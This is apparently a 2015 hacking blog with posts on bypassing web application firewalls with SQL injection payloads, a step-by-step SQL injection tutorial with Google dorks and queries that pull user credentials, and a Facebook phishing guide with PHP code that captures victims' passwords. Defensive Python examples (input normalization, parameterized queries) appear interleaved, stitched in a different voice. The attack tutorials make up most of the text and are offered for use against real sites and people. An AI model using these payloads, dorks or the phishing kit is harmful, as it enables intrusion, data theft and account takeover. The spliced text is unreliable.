Sunday, 29 March 2015
WAF (Web Application Firewall) Bypass Using SQL Injection
Today I'm going to show you how to bypass web application firewalls (WAFs).
Let's begin!
How to know if there is a web application firewall?
This is pretty simple: when you try to enter a command used for SQL injection (usually UNION SELECT), you get a 403 error (and the website says "Forbidden" or "Not Acceptable").
Example:
Code: http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4,5....
(We get a 403 error)
Basic/simple methods:
First, of course, we need to know the basic methods to bypass a WAF.
1) Comments:
You can use comments to bypass the WAF:
Code: http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT 1,2,3,4,5...
(First method that can bypass a WAF.)
However, most WAFs identify this method, so they still show a "Forbidden" error.
2) Change the case of letters:
You can also change the case of the command:
Code: http://www.site.com/index.php?page_id=-15 UnIoN SeLEcT 1,2,3,4,5...
(Another basic method to bypass a WAF!)
However, as before, this trick is also detected by most WAFs.
3) Combine the previous methods:
What you can also do is combine the previous two methods:
Code: http://www.site.com/index.php?page_id=-15 /*!UnIoN*/ /*!SeLecT*/ 1,2,3,4,5....
This method is not detected by many web application firewalls.
4) Replaced keywords:
Some firewalls remove the "UNION SELECT" statement when it is found in the URL. We can do this to exploit that behaviour:
Code: http://www.site.com/index.php?page_id=-15 UNIunionON SELsectECT 1,2,3,4,5...
(The inner "union" and "select" will be removed, so the final result will be "UNION SELECT".)
This method doesn't work on all firewalls, as only some of them remove the UNION and SELECT commands when they are detected.
5) Inline comments:
Some firewalls get bypassed by inserting inline comments between the UNION and SELECT commands:
Code: http://www.site.com/index.php?page_id=-15 UnION/**/SElecT 1,2,3,4,5..
(The U is equal to "U" and S to "S". See more in the advanced sections...)
I believe these are the most basic methods of WAF bypassing. Let's move on to more advanced ones...
Advanced methods:
Now that you have learned about basic WAF bypassing, I think it is good to understand more advanced methods.
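The basic methods above (versioned comments, mixed case, inline comments, and the URL-encoded variant described later) all work against the same weakness: a filter that matches a literal signature on the raw parameter instead of on what the MySQL parser will actually see. As an added example, not code from this page or from any WAF product, here is a small Python normalizer that decodes and strips the comment syntax before matching, run over the page's own payloads (constructed sample inputs; the `SAMPLES` names are mine):

```python
import re
from urllib.parse import unquote_plus

# Constructed sample values for the page_id parameter, copied from the bypass
# variants listed above plus one benign value.
SAMPLES = {
    "plain":       "-15 UNION SELECT 1,2,3,4,5",
    "versioned":   "-15 /*!UNION*/ /*!SELECT 1,2,3,4,5",
    "mixed_case":  "-15 UnIoN SeLEcT 1,2,3,4,5",
    "combined":    "-15 /*!UnIoN*/ /*!SeLecT*/ 1,2,3,4,5",
    "inline":      "-15 UnION/**/SElecT 1,2,3,4,5",
    "url_encoded": "-15+%2F%2A%21union%2A%2F+%2F%2A%21select%2A%2F+1,2,3,4,5",
    "benign":      "15",
}

# The weak rule: a literal, case-sensitive signature on the raw value.
# This is what every obfuscation above is designed to slip past.
NAIVE_SIGNATURE = re.compile(r"UNION SELECT")

def naive_blocks(value):
    return NAIVE_SIGNATURE.search(value) is not None

def normalize(value):
    """Rewrite the parameter into the form the MySQL parser would actually see."""
    # 1. URL-decode to a fixed point so double encoding does not hide anything.
    prev = None
    while prev != value:
        prev, value = value, unquote_plus(value)
    # 2. MySQL executes the body of /*! ... */ and /*!50000 ... */ comments,
    #    so drop only the markers and keep the body (also handles an unterminated one).
    value = re.sub(r"/\*!\d*", " ", value)
    # 3. Ordinary /* ... */ comments are whitespace to the parser.
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    value = re.sub(r"\*/", " ", value)          # closers left over from step 2
    # 4. Collapse whitespace and fold case.
    return re.sub(r"\s+", " ", value).strip().lower()

# Match on the normalized form, allowing the optional ALL/DISTINCT the grammar permits.
UNION_SELECT = re.compile(r"\bunion\b(?:\s+(?:all|distinct))?\s+select\b")

def normalized_blocks(value):
    return UNION_SELECT.search(normalize(value)) is not None

def compare(samples=SAMPLES):
    """Return {name: (naive_result, normalized_result)} for each sample."""
    return {name: (naive_blocks(v), normalized_blocks(v)) for name, v in samples.items()}

if __name__ == "__main__":
    for name, (naive, norm) in compare().items():
        print(f"{name:12s} naive={naive!s:5s} normalized={norm!s:5s} -> {normalize(SAMPLES[name])}")
```

Only the plain payload trips the literal signature, while every variant collapses to `-15 union select 1,2,3,4,5` after normalization. The caveat is that this is still a signature, and signatures on free text have false positives and can always be evaded by the next trick; it is a detection aid, not the fix. The fix lives in the application: bind `page_id` as an integer parameter and the content of the string stops mattering.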
1) Buffer overflow / firewall crash:
Many firewalls are developed in C/C++ and we can crash them using a buffer overflow!
Code: http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn**/+/*!SeLECt*/+1,2,3,4,5....
(You can test whether the WAF can be crashed by typing:
?page_id=null
/**//*!50000UnIOn//*yoyu*/all/**/
/*!SeLEct*/
/*nna*/+1,2,3,4,5...
If you get a 500, you can exploit it using the buffer overflow method!)
2) Replace characters with their HEX values:
We can replace some characters with their HEX (URL-encoded) values.
Example:
Code: http://www.site.com/index.php?page_id=-15 /*!union*/ /*!select*/ 1,2,3,4,5...
(Which means "UNION SELECT")
Text to hex encoder (choose the "Hex Encoded For URL" result): http://www.swingnote.com/tools/texttohex.php
3) Use other variables/commands instead of the common ones for SQLi:
Apart from "UNION SELECT", other commands might be blocked.
Commonly blocked commands:
Code:
COMMAND        | WHAT TO USE INSTEAD
@@version      | version()
concat() | concat_ws() --> Difference Between Concat() And concat_ws(): http://is.gdVEeiDU
group_concat() | concat_ws()
[!] You can also try to SQL inject with the NAME_CONST method: http://is.gd/o10i0d (created by DOWNFALL)
Learning MySQL really helps with such issues!
4) Misc exploitable functions:
Many firewalls try to offer more protection by adding prototype or strange functions (which, of course, we can exploit!):
Example:
The firewall below replaces "*" (asterisks) with whitespace. What we can do is this:
Code: http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4,5....
(If the firewall removes the "*", the result will be: 15+union+select...)
So if you find such a silly function, you can exploit it in this way!
[+] In addition to the previous example, some other bypasses might be:
Code:
-15+(uNioN+(sElECt)...
-15+uNioN+SeleCT)+...
-15+(UnI(oN)+(SeL)(ecT)+..
-15+union (select 1,2,3,4,5...
-15+/*!50000UNION*/+SELECT+1,2,3,4,5...
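Basic method 4 (the keyword nested inside itself) and advanced method 4 (the deleted asterisk) are the same design flaw seen from the defender's side: a filter that deletes the offending text and forwards the remainder lets the attacker choose what the remainder is. As an added example, not code from this page or from any firewall, here is a Python model of both flawed filters beside two repairs, run on the page's own two payloads (constructed sample inputs; `NESTED`, `ASTERISK` and the function names are mine):

```python
import re

# Constructed samples copied from the two "delete the bad bit and carry on" cases above.
NESTED   = "-15 UNIunionON SELsectECT 1,2,3,4,5"   # keyword wrapped around a copy of itself
ASTERISK = "-15+uni*on+sel*ect+1,2,3,4,5"         # keyword split by a character the filter deletes

KEYWORDS = ("union", "select")
UNION_SELECT = re.compile(r"union\W*select", re.I)

def delete_keywords_once(value):
    # Flawed filter 1: a single case-insensitive pass that deletes each keyword
    # and forwards whatever is left.
    for kw in KEYWORDS:
        value = re.sub(kw, "", value, flags=re.I)
    return value

def delete_asterisks(value):
    # Flawed filter 2 (the "misc functions" case): '*' is deleted and the rest is forwarded.
    return value.replace("*", "")

def delete_keywords_to_fixed_point(value):
    # Repair 1: repeat the deletion until the input stops changing, so text freed by
    # one deletion cannot reassemble into a keyword that a single pass has already passed over.
    prev = None
    while prev != value:
        prev, value = value, delete_keywords_once(value)
    return value

def accept(value):
    # Repair 2 (preferred): never rewrite the request. Refuse anything that contains a blocked
    # keyword or a character the old filter would have stripped, log it, and rely on bound
    # parameters in the application for the real protection.
    if "*" in value:
        return False
    return not any(re.search(kw, value, flags=re.I) for kw in KEYWORDS)

def reassembles(value, flawed_filter):
    # True when the filter's OUTPUT contains UNION ... SELECT although its INPUT did not:
    # the filter itself built the injection.
    return (UNION_SELECT.search(value) is None
            and UNION_SELECT.search(flawed_filter(value)) is not None)

if __name__ == "__main__":
    print("nested  , one pass      :", delete_keywords_once(NESTED))
    print("nested  , fixed point   :", delete_keywords_to_fixed_point(NESTED))
    print("asterisk, '*' deleted   :", delete_asterisks(ASTERISK),
          "reassembled:", reassembles(ASTERISK, delete_asterisks))
    print("accept:", accept(NESTED), accept(ASTERISK), accept("15"))
```

The fixed-point loop is the minimal repair for a filter you cannot replace, but it is still a blacklist on free text (it would also refuse a product called "Union Square"); rejecting and logging is the better WAF behaviour, and neither substitutes for parameterized queries in the application.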
Team: AnonDevilz
Member/Hacker: Xyb3r D3vil
Thursday, 19 March 2015
How To Hack A Website Using SQL Injection - A Step By Step Tutorial
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements, or user input is not strongly typed and is thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities. SQL injection attacks are also known as SQL insertion attacks.
Step-By-Step Tutorial For SQL Injection
Step 1: Find a website that is vulnerable to the attack. This is the first step in SQLi and, like every other hack attack, is the most time-consuming step. Once you get through this, the rest is a cakewalk. Now, let us all know what kind of pages are vulnerable to this attack. We are providing you with a few dorks (Google strings to find vulnerable sites). Though at the end of this post, we'll provide a list of vulnerable sites.
Dorks:
accinfo.php?cartId=
acclogin.php?cartID=
add.php?bookid=
add_cart.php?num=
addcart.php?
addItem.php
add-to-cart.php?ID=
addToCart.php?idProduct=
addtomylist.php?ProdId=
adminEditProductFields.php?intProdID=
advSearch_h.php?idCategory=
affiliate.php?ID=
affiliate-agreement.cfm?storeid=
affiliates.php?id=
ancillary.php?ID=
archive.php?id=
article.php?id=
phpx?PageID
basket.php?id=
Book.php?bookID=
book_list.php?bookid=
book_view.php?bookid=
BookDetails.php?ID=
browse.php?catid=
browse_item_details.php
Browse_Item_Details.php?Store_Id=
buy.php?
buy.php?bookid=
bycategory.php?id=
cardinfo.php?card=
cart.php?action=
cart.php?cart_id=
cart.php?id=
cart_additem.php?id=
cart_validate.php?id=
cartadd.php?id=
cat.php?iCat=
catalog.php
catalog.php?CatalogID=
catalog_item.php?ID=
catalog_main.php?catid=
category.php
category.php?catid=
category_list.php?id=
categorydisplay.php?catid=
checkout.php?cartid=
checkout.php?UserID=
checkout_confirmed.php?order_id=
checkout1.php?cartid=
comersus_listCategoriesAndProducts.php?idCategory=
comersus_optEmailToFriendForm.php?idProduct=
comersus_optReviewReadExec.php?idProduct=
comersus_viewItem.php?idProduct=
comments_form.php?ID=
contact.php?cartId=
content.php?id=
customerService.php?****ID1=
default.php?catID=
description.php?bookid=
details.php?BookID=
details.php?Press_Release_ID=
details.php?Product_ID=
details.php?Service_ID=
display_item.php?id=
displayproducts.php
downloadTrial.php?intProdID=
emailproduct.php?itemid=
emailToFriend.php?idProduct=
events.php?ID=
faq.php?cartID=
faq_list.php?id=
faqs.php?id=
feedback.php?title=
freedownload.php?bookid=
fullDisplay.php?item=
getbook.php?bookid=
GetItems.php?itemid=
giftDetail.php?id=
help.php?CartId=
home.php?id=
index.php?cart=
index.php?cartID=
index.php?ID=
info.php?ID=
item.php?eid=
item.php?item_id=
item.php?itemid=
item.php?model=
item.php?prodtype=
item.php?shopcd=
item_details.php?catid=
item_list.php?maingroup
item_show.php?code_no=
itemDesc.php?CartId=
itemdetail.php?item=
itemdetails.php?catalogid=
learnmore.php?cartID=
links.php?catid=
list.php?bookid=
List.php?CatID=
listcategoriesandproducts.php?idCategory=
modline.php?id=
myaccount.php?catid=
news.php?id=
order.php?BookID=
order.php?id=
order.php?item_ID=
OrderForm.php?Cart=
page.php?PartID=
payment.php?CartID=
pdetail.php?item_id=
powersearch.php?CartId=
price.php
privacy.php?cartID=
prodbycat.php?intCatalogID=
prodetails.php?prodid=
prodlist.php?catid=
product.php?bookID=
product.php?intProdID=
product_info.php?item_id=
productDetails.php?idProduct=
productDisplay.php
productinfo.php?item=
productlist.php?ViewType=Category&CategoryID=
productpage.php
products.php?ID=
And you can also write your own.
And download SQL websites from here.
How to check if a website is vulnerable to this attack?
Once you execute the dorks and get the preferred search results, say for example:
http://www.website.com/index.php?catid=1
Add a ' (apostrophe) at the end of the URL, so that the URL looks like:
http://www.website.com/index.php?catid=1'
If the page returns an SQL error, the page is vulnerable to SQLi. If it loads normally, leave the page and move on to the next site in the search results.
Typical errors you'll get after appending the apostrophe are:
Warning:mysql_fetch_array():
Warning:mysql_fetch_assoc():
Warning:mysql_fetch_numrows():
Warning:mysql_fetch_num_rows():
Warning:mysql_fetch_result():
Warning:mysql_fetch_preg_match():
Step 2: Once you find a vulnerable site, you need to enumerate the number of columns and those columns that are accepting the queries from you.
Append an 'order by' statement to the URL.
e.g. http://www.website.com/index.php?catid=1 order by 1
Continue increasing the number after ORDER BY till you get an error. So the highest number for which you do not get an error is the number of columns in the table. Now, to know the column numbers which are accepting the queries:
Append a 'union select' statement to the URL. Also precede the number after "id=" with a hyphen or minus.
Say from the above step, you got that the table has 6 columns.
Eg. http://www.website.com/index.php?catid=-1 union select 1,2,3,4,5,6
The result of this query will be the column numbers that are accepting the queries. Say we get 2,3,4 as the result. Now we'll inject our SQL statements in one of these columns.
Step 3: Enumerating the SQL version
We'll use the MySQL variable @@version to get the version of the DB. We have to inject it in one of the open columns. Say we use column number 2.
eg. http://www.website.com/index.php?catid=-1 union select 1,@@version,3,4,5,6
You'll get the version of the database in the place where you had got the number 2. If the start of the version number is 5 or more, then you are good to go. If less, move on to another site.
Step 4: Exploit
To get the list of databases:
http://www.website.com/index.php?catid=-1 union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata--
The result will display a list of databases on the site. From here on, we'll write the results we have got from our test.
Result: information_schema, vrk_mlm
To know the current database in use:
http://www.website.com/index.php?catid=-1 union select 1,concat(database()),3,4,5,6--
Result: vrk_mlm
To get the current user:
http://www.website.com/index.php?catid=-1 union select 1,concat(user()),3,4,5,6--
Result: vrk_4mlm@localhost
To get the tables:
http://www.website.com/index.php?catid=-1 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--
Result: administrator,category,product,users
We'll concentrate our attack on the users table.
To get the columns:
http://www.website.com/index.php?catid=-1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_Schema=database()--
Result: admin_id,user_name,password,user_type,status,catID,catName,prodId,catID,prodName,prodDesc,prodKeyword,prodPrice,prodPrice,prodImage,id,incredible_id,f_name,m_name,l_name,refered_by_id,refered_direct_to_ids,refered_toids,no_of_direct_reterals,credits,position,email_id,password,editied_on,last_login,created_on,chain_number,phone,address
By looking at the columns closely, and at the order of the tables, we can conclude that the columns starting from id,incredible_id belong to the users table, and that is the one we are interested in.
Extract information:
union select group_concat(id,0x3a,incredible_id,0x3a,f_name,0x3a,m_name,0x3a,l_name,0x3a,refered_by_id,0x3a,refered_direct_to_ids,0x3a) from vrk_mlm.users--
Now you will get the admin username and password....
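Every probe in Steps 1 to 4 works for one reason: the `catid` value is pasted into the SQL text, so a quote breaks the statement, `order by N` is parsed as part of it, and `-1 union select ...` appends a second query. As an added example, not code from this page, the following Python replays the tutorial's first three probes against a vulnerable lookup and two hardened ones. It uses Python's built-in `sqlite3` instead of MySQL so it runs offline, on a constructed six-column `product` table; the function names and the table contents are mine:

```python
import sqlite3

def make_db():
    """Constructed sample schema: a six-column product table like the one the tutorial enumerates."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (prodId INTEGER, catID INTEGER, prodName TEXT,"
                 " prodDesc TEXT, prodPrice REAL, prodImage TEXT)")
    conn.executemany("INSERT INTO product VALUES (?,?,?,?,?,?)", [
        (1, 1, "widget", "a widget", 9.99, "w.png"),
        (2, 1, "gadget", "a gadget", 19.99, "g.png"),
        (3, 2, "gizmo",  "a gizmo",  4.50, "z.png"),
    ])
    return conn

def vulnerable_lookup(conn, catid):
    # Vulnerable: the raw request parameter is concatenated into the SQL text,
    # which is exactly what makes the ' / order by / union probes work.
    return conn.execute("SELECT * FROM product WHERE catID=" + catid).fetchall()

def bound_lookup(conn, catid):
    # Hardened (minimal): the value is bound as a parameter. It is compared as data,
    # so it can never extend the statement no matter what it contains.
    return conn.execute("SELECT * FROM product WHERE catID=?", (catid,)).fetchall()

def safe_lookup(conn, catid):
    # Hardened (preferred): validate the type first, then bind. Malformed ids are rejected
    # up front, which is also the cheapest event to log and alert on.
    if not catid.lstrip("-").isdigit():
        raise ValueError("catid must be an integer")
    return bound_lookup(conn, int(catid))

def probe(fn, conn, catid):
    """Replay one request and report ('ok', rows) or ('error', exception name)."""
    try:
        return ("ok", fn(conn, catid))
    except (sqlite3.Error, ValueError) as exc:
        return ("error", type(exc).__name__)

# The probes the tutorial uses, in order (constructed inputs).
PROBES = ["1'", "1 order by 6", "1 order by 7", "-1 union select 1,2,3,4,5,6"]

def replay(fn):
    """Run every probe against a fresh database through the given lookup function."""
    conn = make_db()
    return {p: probe(fn, conn, p) for p in PROBES}

if __name__ == "__main__":
    for name, fn in (("vulnerable", vulnerable_lookup), ("bound", bound_lookup), ("safe", safe_lookup)):
        print(name)
        for p, result in replay(fn).items():
            print(f"  {p!r:34s} -> {result}")
```

Against `vulnerable_lookup` the replay reproduces the tutorial's signals exactly: the apostrophe raises a database error, `order by 6` succeeds while `order by 7` errors, and the union probe returns the marker row `(1, 2, 3, 4, 5, 6)`. Against `bound_lookup` every probe simply returns no rows, because the whole string is compared with `catID` as a value, and against `safe_lookup` every probe is refused before a query is issued. The error messages in Step 1 are a second defect of the same application: they belong in a server-side log, not in the HTTP response.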
Team: AnonDevilz
Member/Hacker: Xyb3r D3vil
Wednesday, 18 March 2015
How To Hack Facebook Account Using Phishing
How To Hack Facebook Account Using Phishing Page (Fake Page)
Steps To Creat Phishing Page:
1. Go To The Facebook Page , And Then Right Click On The Page, You Will See The Option VIEW SOURCE PAGE , Click On That.
2. Now A New Tab Will Open Which Contaun A Source Code, Select All The Stuff And Paste It In A Notepad.
3. Now Open The Notepad And Press CTRL + F, And Type ACTION.
4. You Will Have To Find A Text Which Looks Like...
action="https://www.facebook.com/login.php?login attempt=1"
5. Now Change The Text To post.php. Then It Will Look Like...
action="post.php"
6.Now Save It On your Desktop Woth the Name index.htm , Not index.html ,Remember.
7. Now Your Phishing Page Is Ready. It Will Look Like A Facebook Login Page.
8. Open A New Notepad And Save The Given Data With The Name post.php
<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("username.txt","a");
foreach($_POST as $variable => $value) {
fwrite)handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
9. You Have 2 Files Now One Is index.htm And Another Is post.php , Remember File Extension Is Important.
10. Now You Have To Upload It In A WEB HOSTING Site , I Prefer You To Use 000webhosting or else My3gb.
11. I Prefer You To Use 000webhost Because It Will Be Easy To Use.
12. You Have To Make A Account In That.
13. Now Go CONTROL PANEL , Then On FILE MANAGER .
14. After That A New Window Will Pop-up, Now Go To public_html .
15. Delete The File Named Default.php , After That Upload 2 Files index.htm And post.php One By One.
16. Now The Last Step Click On View Of index.htm It Will Look Same As Facebook Page.
17. Copy The URL Of That Page And Send this Link To Your Victim, When Your Victim Try To Log In To It With The Username And Password. The Page Redirectly Connect To Facebook. And You Will Be Now Able To See His Password.
18. Open Your 000webhost Account And Go To File Manager Then Public_html , Here You Find A New File Named username.txt
19. Click On View Now You Will Have Your Friend's Password And Email Id.
You Can Download Phishing Script's From This Download Link: 34 In 1 Mega Pack Of Phishing
Hacker: Xyb3r D3vil
Team: AnonDevilz
Comment If You Face Any Problem...
Tuesday, 17 March 2015
Monday, 9 March 2015
Download Back|Track 5 R3 - KDE 32, 64,
Back|Track 5 R3 - KDE
Download Link: Back|Track 5 R3 - KDE 32 Bit
Download Link: Back|Track 5 R3 - KDE 64 Bit
How To Download:
Official Page: Xyb3r D3vil